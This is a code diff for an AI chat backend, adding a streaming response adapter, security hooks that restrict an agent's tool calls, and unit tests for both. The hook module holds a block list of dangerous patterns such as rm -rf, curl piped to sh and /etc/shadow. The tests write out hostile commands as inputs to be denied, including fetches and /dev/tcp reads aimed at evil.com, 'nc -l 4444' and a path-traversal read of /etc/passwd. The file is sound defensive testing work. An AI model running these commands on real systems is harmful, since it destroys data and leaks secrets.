+                    output = pop_pending_tool_output(tool_name) or (
+                        _extract_tool_output(block.content)
+                    )
+
+                    responses.append(
+                        StreamToolOutputAvailable(
+                            toolCallId=block.tool_use_id,
+                            toolName=tool_name,
+                            output=output,
+                            success=not (block.is_error or False),
+                        )
+                    )
+
+            # Close the current step after tool results — the next
+            # AssistantMessage will open a new step for the continuation.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+        elif isinstance(sdk_message, ResultMessage):
+            self._end_text_if_open(responses)
+            # Close the step before finishing.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+            # Emit token usage if the SDK reported it
+            usage = getattr(sdk_message, "usage", None) or {}
+            if usage:
+                input_tokens = usage.get("input_tokens", 0)
+                output_tokens = usage.get("output_tokens", 0)
+                responses.append(
+                    StreamUsage(
+                        promptTokens=input_tokens,
+                        completionTokens=output_tokens,
+                        totalTokens=input_tokens + output_tokens,
+                    )
+                )
+
+            if sdk_message.subtype == "success":
+                responses.append(StreamFinish())
+            elif sdk_message.subtype in ("error", "error_during_execution"):
+                error_msg = getattr(sdk_message, "result", None) or "Unknown error"
+                responses.append(
+                    StreamError(errorText=str(error_msg), code="sdk_error")
+                )
+                responses.append(StreamFinish())
+
+        else:
+            logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
+
+        return responses
+
+    def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
+        """Start (or restart) a text block if needed."""
+        if not self.has_started_text or self.has_ended_text:
+            if self.has_ended_text:
+                self.text_block_id = str(uuid.uuid4())
+                self.has_ended_text = False
+            responses.append(StreamTextStart(id=self.text_block_id))
+            self.has_started_text = True
+
+    def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
+        """End the current text block if one is open."""
+        if self.has_started_text and not self.has_ended_text:
+            responses.append(StreamTextEnd(id=self.text_block_id))
+            self.has_ended_text = True
+
+
+def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+    """Extract a string output from a ToolResultBlock's content field."""
+    if isinstance(content, str):
+        return content
+    if isinstance(content, list):
+        parts = [item.get("text", "") for item in content if item.get("type") == "text"]
+        if parts:
+            return "".join(parts)
+        try:
+            return json.dumps(content)
+        except (TypeError, ValueError):
+            return str(content)
+    if content is None:
+        return ""
+    try:
+        return json.dumps(content)
+    except (TypeError, ValueError):
+        return str(content)
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
@@ -0,0 +1,366 @@
+"""Unit tests for the SDK response adapter."""
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+)
+
+from .response_adapter import SDKResponseAdapter
+from .tool_adapter import MCP_TOOL_PREFIX
+
+
+def _adapter() -> SDKResponseAdapter:
+    a = SDKResponseAdapter(message_id="msg-1")
+    a.set_task_id("task-1")
+    return a
+
+
+# -- SystemMessage -----------------------------------------------------------
+
+
+def test_system_init_emits_start_and_step():
+    adapter = _adapter()
+    results = adapter.convert_message(SystemMessage(subtype="init", data={}))
+    assert len(results) == 2
+    assert isinstance(results[0], StreamStart)
+    assert results[0].messageId == "msg-1"
+    assert results[0].taskId == "task-1"
+    assert isinstance(results[1], StreamStartStep)
+
+
+def test_system_non_init_emits_nothing():
+    adapter = _adapter()
+    results = adapter.convert_message(SystemMessage(subtype="other", data={}))
+    assert results == []
+
+
+# -- AssistantMessage with TextBlock -----------------------------------------
+
+
+def test_text_block_emits_step_start_and_delta():
+    adapter = _adapter()
+    msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
+    results = adapter.convert_message(msg)
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamTextStart)
+    assert isinstance(results[2], StreamTextDelta)
+    assert results[2].delta == "hello"
+
+
+def test_empty_text_block_emits_only_step():
+    adapter = _adapter()
+    msg = AssistantMessage(content=[TextBlock(text="")], model="test")
+    results = adapter.convert_message(msg)
+    # Empty text skipped, but step still opens
+    assert len(results) == 1
+    assert isinstance(results[0], StreamStartStep)
+
+
+def test_multiple_text_deltas_reuse_block_id():
+    adapter = _adapter()
+    msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
+    msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
+    r1 = adapter.convert_message(msg1)
+    r2 = adapter.convert_message(msg2)
+    # First gets step+start+delta, second only delta (block & step already started)
+    assert len(r1) == 3
+    assert isinstance(r1[0], StreamStartStep)
+    assert isinstance(r1[1], StreamTextStart)
+    assert len(r2) == 1
+    assert isinstance(r2[0], StreamTextDelta)
+    assert r1[1].id == r2[0].id  # same block ID
+
+
+# -- AssistantMessage with ToolUseBlock --------------------------------------
+
+
+def test_tool_use_emits_input_start_and_available():
+    """Tool names arrive with MCP prefix and should be stripped for the frontend."""
+    adapter = _adapter()
+    msg = AssistantMessage(
+        content=[
+            ToolUseBlock(
+                id="tool-1",
+                name=f"{MCP_TOOL_PREFIX}find_agent",
+                input={"q": "x"},
+            )
+        ],
+        model="test",
+    )
+    results = adapter.convert_message(msg)
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamToolInputStart)
+    assert results[1].toolCallId == "tool-1"
+    assert results[1].toolName == "find_agent"  # prefix stripped
+    assert isinstance(results[2], StreamToolInputAvailable)
+    assert results[2].toolName == "find_agent"  # prefix stripped
+    assert results[2].input == {"q": "x"}
+
+
+def test_text_then_tool_ends_text_block():
+    adapter = _adapter()
+    text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
+    tool_msg = AssistantMessage(
+        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+        model="test",
+    )
+    adapter.convert_message(text_msg)  # opens step + text
+    results = adapter.convert_message(tool_msg)
+    # Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
+    assert len(results) == 3
+    assert isinstance(results[0], StreamTextEnd)
+    assert isinstance(results[1], StreamToolInputStart)
+
+
+# -- UserMessage with ToolResultBlock ----------------------------------------
+
+
+def test_tool_result_emits_output_and_finish_step():
+    adapter = _adapter()
+    # First register the tool call (opens step) — SDK sends prefixed name
+    tool_msg = AssistantMessage(
+        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
+        model="test",
+    )
+    adapter.convert_message(tool_msg)
+
+    # Now send tool result
+    result_msg = UserMessage(
+        content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
+    )
+    results = adapter.convert_message(result_msg)
+    assert len(results) == 2
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].toolCallId == "t1"
+    assert results[0].toolName == "find_agent"  # prefix stripped
+    assert results[0].output == "found 3 agents"
+    assert results[0].success is True
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_tool_result_error():
+    adapter = _adapter()
+    adapter.convert_message(
+        AssistantMessage(
+            content=[
+                ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
+            ],
+            model="test",
+        )
+    )
+    result_msg = UserMessage(
+        content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
+    )
+    results = adapter.convert_message(result_msg)
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].success is False
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_tool_result_list_content():
+    adapter = _adapter()
+    adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+    result_msg = UserMessage(
+        content=[
+            ToolResultBlock(
+                tool_use_id="t1",
+                content=[
+                    {"type": "text", "text": "line1"},
+                    {"type": "text", "text": "line2"},
+                ],
+            )
+        ]
+    )
+    results = adapter.convert_message(result_msg)
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].output == "line1line2"
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_string_user_message_ignored():
+    """A plain string UserMessage (not tool results) produces no output."""
+    adapter = _adapter()
+    results = adapter.convert_message(UserMessage(content="hello"))
+    assert results == []
+
+
+# -- ResultMessage -----------------------------------------------------------
+
+
+def test_result_success_emits_finish_step_and_finish():
+    adapter = _adapter()
+    # Start some text first (opens step)
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="done")], model="test")
+    )
+    msg = ResultMessage(
+        subtype="success",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=False,
+        num_turns=1,
+        session_id="s1",
+    )
+    results = adapter.convert_message(msg)
+    # TextEnd + FinishStep + StreamFinish
+    assert len(results) == 3
+    assert isinstance(results[0], StreamTextEnd)
+    assert isinstance(results[1], StreamFinishStep)
+    assert isinstance(results[2], StreamFinish)
+
+
+def test_result_error_emits_error_and_finish():
+    adapter = _adapter()
+    msg = ResultMessage(
+        subtype="error",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=True,
+        num_turns=0,
+        session_id="s1",
+        result="API rate limited",
+    )
+    results = adapter.convert_message(msg)
+    # No step was open, so no FinishStep — just Error + Finish
+    assert len(results) == 2
+    assert isinstance(results[0], StreamError)
+    assert "API rate limited" in results[0].errorText
+    assert isinstance(results[1], StreamFinish)
+
+
+# -- Text after tools (new block ID) ----------------------------------------
+
+
+def test_text_after_tool_gets_new_block_id():
+    adapter = _adapter()
+    # Text -> Tool -> ToolResult -> Text should get a new text block ID and step
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="before")], model="test")
+    )
+    adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+    # Send tool result (closes step)
+    adapter.convert_message(
+        UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
+    )
+    results = adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="after")], model="test")
+    )
+    # Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamTextStart)
+    assert isinstance(results[2], StreamTextDelta)
+    assert results[2].delta == "after"
+
+
+# -- Full conversation flow --------------------------------------------------
+
+
+def test_full_conversation_flow():
+    """Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
+    adapter = _adapter()
+    all_responses: list[StreamBaseResponse] = []
+
+    # 1. Init
+    all_responses.extend(
+        adapter.convert_message(SystemMessage(subtype="init", data={}))
+    )
+    # 2. Assistant text
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
+        )
+    )
+    # 3. Tool use
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(
+                content=[
+                    ToolUseBlock(
+                        id="t1",
+                        name=f"{MCP_TOOL_PREFIX}find_agent",
+                        input={"query": "email"},
+                    )
+                ],
+                model="test",
+            )
+        )
+    )
+    # 4. Tool result
+    all_responses.extend(
+        adapter.convert_message(
+            UserMessage(
+                content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
+            )
+        )
+    )
+    # 5. More text
+    all_responses.extend(
+        adapter.convert_message(
+            AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
+        )
+    )
+    # 6. Result
+    all_responses.extend(
+        adapter.convert_message(
+            ResultMessage(
+                subtype="success",
+                duration_ms=500,
+                duration_api_ms=400,
+                is_error=False,
+                num_turns=2,
+                session_id="s1",
+            )
+        )
+    )
+
+    types = [type(r).__name__ for r in all_responses]
+    assert types == [
+        "StreamStart",
+        "StreamStartStep",  # step 1: text + tool call
+        "StreamTextStart",
+        "StreamTextDelta",  # "Let me search"
+        "StreamTextEnd",  # closed before tool
+        "StreamToolInputStart",
+        "StreamToolInputAvailable",
+        "StreamToolOutputAvailable",  # tool result
+        "StreamFinishStep",  # step 1 closed after tool result
+        "StreamStartStep",  # step 2: continuation text
+        "StreamTextStart",  # new block after tool
+        "StreamTextDelta",  # "I found 2"
+        "StreamTextEnd",  # closed by result
+        "StreamFinishStep",  # step 2 closed
+        "StreamFinish",
+    ]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks.py
@@ -0,0 +1,393 @@
+"""Security hooks for Claude Agent SDK integration.
+
+This module provides security hooks that validate tool calls before execution,
+ensuring multi-user isolation and preventing unauthorized operations.
+"""
+
+import json
+import logging
+import os
+import re
+import shlex
+from typing import Any, cast
+
+from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
+
+logger = logging.getLogger(__name__)
+
+# Tools that are blocked entirely (CLI/system access)
+BLOCKED_TOOLS = {
+    "bash",
+    "shell",
+    "exec",
+    "terminal",
+    "command",
+}
+
+# Safe read-only commands allowed in the sandboxed Bash tool.
+# These are data-processing / inspection utilities — no writes, no network.
+ALLOWED_BASH_COMMANDS = {
+    # JSON / structured data
+    "jq",
+    # Text processing
+    "grep",
+    "egrep",
+    "fgrep",
+    "rg",
+    "head",
+    "tail",
+    "cat",
+    "wc",
+    "sort",
+    "uniq",
+    "cut",
+    "tr",
+    "sed",
+    "awk",
+    "column",
+    "fold",
+    "fmt",
+    "nl",
+    "paste",
+    "rev",
+    # File inspection (read-only)
+    "find",
+    "ls",
+    "file",
+    "stat",
+    "du",
+    "tree",
+    "basename",
+    "dirname",
+    "realpath",
+    # Utilities
+    "echo",
+    "printf",
+    "date",
+    "true",
+    "false",
+    "xargs",
+    "tee",
+    # Comparison / encoding
+    "diff",
+    "comm",
+    "base64",
+    "md5sum",
+    "sha256sum",
+}
+
+# Tools allowed only when their path argument stays within the SDK workspace.
+# The SDK uses these to handle oversized tool results (writes to tool-results/
+# files, then reads them back) and for workspace file operations.
+WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
+
+# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
+SANDBOXED_BASH_TOOLS = {"Bash"}
+
+# Dangerous patterns in tool inputs
+DANGEROUS_PATTERNS = [
+    r"sudo",
+    r"rm\s+-rf",
+    r"dd\s+if=",
+    r"/etc/passwd",
+    r"/etc/shadow",
+    r"chmod\s+777",
+    r"curl\s+.*\|.*sh",
+    r"wget\s+.*\|.*sh",
+    r"eval\s*\(",
+    r"exec\s*\(",
+    r"__import__",
+    r"os\.system",
+    r"subprocess",
+]
+
+
+def _deny(reason: str) -> dict[str, Any]:
+    """Return a hook denial response."""
+    return {
+        "hookSpecificOutput": {
+            "hookEventName": "PreToolUse",
+            "permissionDecision": "deny",
+            "permissionDecisionReason": reason,
+        }
+    }
+
+
+def _validate_workspace_path(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate that a workspace-scoped tool only accesses allowed paths.
+
+    Allowed directories:
+    - The SDK working directory (``/tmp/copilot-<session>/``)
+    - The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
+    """
+    path = tool_input.get("file_path") or tool_input.get("path") or ""
+    if not path:
+        # Glob/Grep without a path default to cwd which is already sandboxed
+        return {}
+
+    resolved = os.path.normpath(os.path.expanduser(path))
+
+    # Allow access within the SDK working directory
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
+            return {}
+
+    # Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
+    claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+    if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
+        return {}
+
+    logger.warning(
+        f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
+    )
+    return _deny(
+        f"Tool '{tool_name}' can only access files within the workspace directory."
+    )
+
+
+def _validate_bash_command(
+    tool_input: dict[str, Any], sdk_cwd: str | None
+) -> dict[str, Any]:
+    """Validate a Bash command against the allowlist of safe commands.
+
+    Only read-only data-processing commands are allowed (jq, grep, head, etc.).
+    Blocks command substitution, output redirection, and disallowed executables.
+
+    Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
+    containing ``|`` won't be mistaken for shell pipes).
+    """
+    command = tool_input.get("command", "")
+    if not command or not isinstance(command, str):
+        return _deny("Bash command is empty.")
+
+    # Block command substitution — can smuggle arbitrary commands
+    if "$(" in command or "`" in command:
+        return _deny("Command substitution ($() or ``) is not allowed in Bash.")
+
+    # Block output redirection — Bash should be read-only
+    if re.search(r"(?<!\d)>{1,2}\s", command):
+        return _deny("Output redirection (> or >>) is not allowed in Bash.")
+
+    # Block /dev/ access (e.g., /dev/tcp for network)
+    if "/dev/" in command:
+        return _deny("Access to /dev/ is not allowed in Bash.")
+
+    # Tokenize with shlex (respects quotes), then extract command names.
+    # shlex preserves shell operators like | ; && || as separate tokens.
+    try:
+        tokens = shlex.split(command)
+    except ValueError:
+        return _deny("Malformed command (unmatched quotes).")
+
+    # Walk tokens: the first non-assignment token after a pipe/separator is a command.
+    expect_command = True
+    for token in tokens:
+        if token in ("|", "||", "&&", ";"):
+            expect_command = True
+            continue
+        if expect_command:
+            # Skip env var assignments (VAR=value)
+            if "=" in token and not token.startswith("-"):
+                continue
+            cmd_name = os.path.basename(token)
+            if cmd_name not in ALLOWED_BASH_COMMANDS:
+                allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
+                logger.warning(f"Blocked Bash command: {cmd_name}")
+                return _deny(
+                    f"Command '{cmd_name}' is not allowed. "
+                    f"Allowed commands: {allowed}"
+                )
+            expect_command = False
+
+    # Validate absolute file paths stay within workspace
+    if sdk_cwd:
+        norm_cwd = os.path.normpath(sdk_cwd)
+        claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
+        for token in tokens:
+            if not token.startswith("/"):
+                continue
+            resolved = os.path.normpath(token)
+            if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
+                continue
+            if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
+                continue
+            logger.warning(f"Blocked Bash path outside workspace: {token}")
+            return _deny(
+                f"Bash can only access files within the workspace directory. "
+                f"Path '{token}' is outside the workspace."
+            )
+
+    return {}
+
+
+def _validate_tool_access(
+    tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Validate that a tool call is allowed.
+
+    Returns:
+        Empty dict to allow, or dict with hookSpecificOutput to deny
+    """
+    # Block forbidden tools
+    if tool_name in BLOCKED_TOOLS:
+        logger.warning(f"Blocked tool access attempt: {tool_name}")
+        return _deny(
+            f"Tool '{tool_name}' is not available. "
+            "Use the CoPilot-specific tools instead."
+        )
+
+    # Sandboxed Bash: only allowlisted commands, workspace-scoped paths
+    if tool_name in SANDBOXED_BASH_TOOLS:
+        return _validate_bash_command(tool_input, sdk_cwd)
+
+    # Workspace-scoped tools: allowed only within the SDK workspace directory
+    if tool_name in WORKSPACE_SCOPED_TOOLS:
+        return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
+
+    # Check for dangerous patterns in tool input
+    # Use json.dumps for predictable format (str() produces Python repr)
+    input_str = json.dumps(tool_input) if tool_input else ""
+
+    for pattern in DANGEROUS_PATTERNS:
+        if re.search(pattern, input_str, re.IGNORECASE):
+            logger.warning(
+                f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
+            )
+            return _deny("Input contains blocked pattern")
+
+    return {}
+
+
+def _validate_user_isolation(
+    tool_name: str, tool_input: dict[str, Any], user_id: str | None
+) -> dict[str, Any]:
+    """Validate that tool calls respect user isolation."""
+    # For workspace file tools, ensure path doesn't escape
+    if "workspace" in tool_name.lower():
+        path = tool_input.get("path", "") or tool_input.get("file_path", "")
+        if path:
+            # Check for path traversal
+            if ".." in path or path.startswith("/"):
+                logger.warning(
+                    f"Blocked path traversal attempt: {path} by user {user_id}"
+                )
+                return {
+                    "hookSpecificOutput": {
+                        "hookEventName": "PreToolUse",
+                        "permissionDecision": "deny",
+                        "permissionDecisionReason": "Path traversal not allowed",
+                    }
+                }
+
+    return {}
+
+
+def create_security_hooks(
+    user_id: str | None, sdk_cwd: str | None = None
+) -> dict[str, Any]:
+    """Create the security hooks configuration for Claude Agent SDK.
+
+    Includes security validation and observability hooks:
+    - PreToolUse: Security validation before tool execution
+    - PostToolUse: Log successful tool executions
+    - PostToolUseFailure: Log and handle failed tool executions
+    - PreCompact: Log context compaction events (SDK handles compaction automatically)
+
+    Args:
+        user_id: Current user ID for isolation validation
+        sdk_cwd: SDK working directory for workspace-scoped tool validation
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions
+    """
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def pre_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Combined pre-tool-use validation hook."""
+            _ = context  # unused but required by signature
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
+
+            # Strip MCP prefix for consistent validation
+            is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
+            clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
+
+            # Only block non-CoPilot tools; our MCP-registered tools
+            # (including Read for oversized results) are already sandboxed.
+            if not is_copilot_tool:
+                result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
+                if result:
+                    return cast(SyncHookJSONOutput, result)
+
+            # Validate user isolation
+            result = _validate_user_isolation(clean_name, tool_input, user_id)
+            if result:
+                return cast(SyncHookJSONOutput, result)
+
+            logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_use_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log successful tool executions for observability."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
+            return cast(SyncHookJSONOutput, {})
+
+        async def post_tool_failure_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log failed tool executions for debugging."""
+            _ = context
+            tool_name = cast(str, input_data.get("tool_name", ""))
+            error = input_data.get("error", "Unknown error")
+            logger.warning(
+                f"[SDK] Tool failed: {tool_name}, error={error}, "
+                f"user={user_id}, tool_use_id={tool_use_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        async def pre_compact_hook(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Log when SDK triggers context compaction.
+
+            The SDK automatically compacts conversation history when it grows too large.
+            This hook provides visibility into when compaction happens.
+            """
+            _ = context, tool_use_id
+            trigger = input_data.get("trigger", "auto")
+            logger.info(
+                f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
+            )
+            return cast(SyncHookJSONOutput, {})
+
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
+            ],
+            "PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
+        }
+    except ImportError:
+        # Fallback for when SDK isn't available - return empty hooks
+        logger.warning("claude-agent-sdk not available, security hooks disabled")
+        return {}
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/security_hooks_test.py
@@ -0,0 +1,258 @@
+"""Unit tests for SDK security hooks."""
+
+import os
+
+from .security_hooks import _validate_tool_access, _validate_user_isolation
+
+SDK_CWD = "/tmp/copilot-abc123"
+
+
+def _is_denied(result: dict) -> bool:
+    hook = result.get("hookSpecificOutput", {})
+    return hook.get("permissionDecision") == "deny"
+
+
+# -- Blocked tools -----------------------------------------------------------
+
+
+def test_blocked_tools_denied():
+    for tool in ("bash", "shell", "exec", "terminal", "command"):
+        result = _validate_tool_access(tool, {})
+        assert _is_denied(result), f"{tool} should be blocked"
+
+
+def test_unknown_tool_allowed():
+    result = _validate_tool_access("SomeCustomTool", {})
+    assert result == {}
+
+
+# -- Workspace-scoped tools --------------------------------------------------
+
+
+def test_read_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert result == {}
+
+
+def test_write_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
+    )
+    assert result == {}
+
+
+def test_edit_within_workspace_allowed():
+    result = _validate_tool_access(
+        "Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
+    )
+    assert result == {}
+
+
+def test_glob_within_workspace_allowed():
+    result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_grep_within_workspace_allowed():
+    result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_read_outside_workspace_denied():
+    result = _validate_tool_access(
+        "Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_write_outside_workspace_denied():
+    result = _validate_tool_access(
+        "Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_traversal_attack_denied():
+    result = _validate_tool_access(
+        "Read",
+        {"file_path": f"{SDK_CWD}/../../etc/passwd"},
+        sdk_cwd=SDK_CWD,
+    )
+    assert _is_denied(result)
+
+
+def test_no_path_allowed():
+    """Glob/Grep without a path argument defaults to cwd — should pass."""
+    result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_read_no_cwd_denies_absolute():
+    """If no sdk_cwd is set, absolute paths are denied."""
+    result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
+    assert _is_denied(result)
+
+
+# -- Tool-results directory --------------------------------------------------
+
+
+def test_read_tool_results_allowed():
+    home = os.path.expanduser("~")
+    path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
+    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
+    assert result == {}
+
+
+def test_read_claude_projects_without_tool_results_denied():
+    home = os.path.expanduser("~")
+    path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
+    result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
+    assert _is_denied(result)
+
+
+# -- Sandboxed Bash ----------------------------------------------------------
+
+
+def test_bash_safe_commands_allowed():
+    """Allowed data-processing commands should pass."""
+    safe_commands = [
+        "jq '.blocks' result.json",
+        "head -20 output.json",
+        "tail -n 50 data.txt",
+        "cat file.txt | grep 'pattern'",
+        "wc -l file.txt",
+        "sort data.csv | uniq",
+        "grep -i 'error' log.txt | head -10",
+        "find . -name '*.json'",
+        "ls -la",
+        "echo hello",
+        "cut -d',' -f1 data.csv | sort | uniq -c",
+        "jq '.blocks[] | .id' result.json",
+        "sed -n '10,20p' file.txt",
+        "awk '{print $1}' data.txt",
+    ]
+    for cmd in safe_commands:
+        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert result == {}, f"Safe command should be allowed: {cmd}"
+
+
+def test_bash_dangerous_commands_denied():
+    """Non-allowlisted commands should be denied."""
+    dangerous = [
+        "curl https://evil.com",
+        "wget https://evil.com/payload",
+        "rm -rf /",
+        "python -c 'import os; os.system(\"ls\")'",
+        "ssh user@host",
+        "nc -l 4444",
+        "apt install something",
+        "pip install malware",
+        "chmod 777 file.txt",
+        "kill -9 1",
+    ]
+    for cmd in dangerous:
+        result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
+        assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
+
+
+def test_bash_command_substitution_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_backtick_substitution_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_output_redirect_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_dev_tcp_denied():
+    result = _validate_tool_access(
+        "Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_pipe_to_dangerous_denied():
+    """Even if the first command is safe, piped commands must also be safe."""
+    result = _validate_tool_access(
+        "Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
+    )
+    assert _is_denied(result)
+
+
+def test_bash_path_outside_workspace_denied():
